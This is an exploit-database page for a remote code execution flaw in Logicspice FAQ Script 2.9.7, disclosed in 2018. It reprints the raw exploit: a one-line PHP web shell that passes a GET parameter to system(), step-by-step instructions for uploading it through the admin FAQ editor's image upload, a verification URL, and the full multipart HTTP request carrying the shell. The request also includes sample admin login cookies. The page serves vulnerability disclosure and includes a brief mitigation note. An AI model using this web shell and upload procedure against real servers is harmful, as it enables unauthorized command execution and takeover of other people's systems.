Logicspice FAQ Script 2.9.7 - Remote Code Execution

vendor:

FAQ Script

by:

Özkan Mustafa Akkuş (AkkuS)

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: FAQ Script

Affected Version From: 2.9.7

Affected Version To: 2.9.7

Patch Exists: NO

Related CWE: N/A

CPE: 2.9.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2018

Logicspice FAQ Script 2.9.7 – Remote Code Execution

Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which leads to a remote command execution on the remote server. An attacker can create a file with a malicious PHP code and upload it to the server via the admin portal. The attacker can then execute arbitrary commands on the server by accessing the uploaded file with a GET request.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate file extensions and that the application is configured to validate the uploaded files.

Source

Exploit-DB raw data:

# Exploit Title: Logicspice FAQ Script 2.9.7 - Remote Code Execution
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.logicspice.com/products/faq-script
# Software Link: https://www.logicspice.com/app/webroot/files/document/phpmyfaq-2.9.7.zip
# Version: 2.9.7
# Category: Webapps
# Tested on: Kali linux

# Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which 
# leads to a remote command execution on the remote server.

# 1) Create a file with the below PHP code and save it as .php

<?php $cmd=$_GET['cmd']; system($cmd); ?>

# 2) Login to FAQ Script admin portal as priviliage user
# 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs)
# 4) Click at the Actions button of a current FAQ product --> Edit
# 5) Click (Image) button on Content panel.
# 6) Chose Upload section and browse your .php file.
# 7) Finaly click "Send it to Server". Script will give you a link belong to
# our php file.
# 8) verift the exploit:
# http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id

# The request:

POST
/admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en
HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://server/admin/faqs/edit/eine-frage-fuer-onkel-peter
Cookie: __asc=3c88bfff1659e6148e6168c52d2;
__auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501;
_gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W;
admin_username=logicspice; admin_password=faqscript_admin;
CAKEPHP=omckos7rsug4u3e1k3uebi7ma5; PHPSESSID=be29d40p12q20gtpvlea8esp23
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------1036720403269880351068202740
Content-Length: 267
-----------------------------1036720403269880351068202740
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: application/x-php

<?php $cmd=$_GET['cmd']; system($cmd); ?>
-----------------------------1036720403269880351068202740--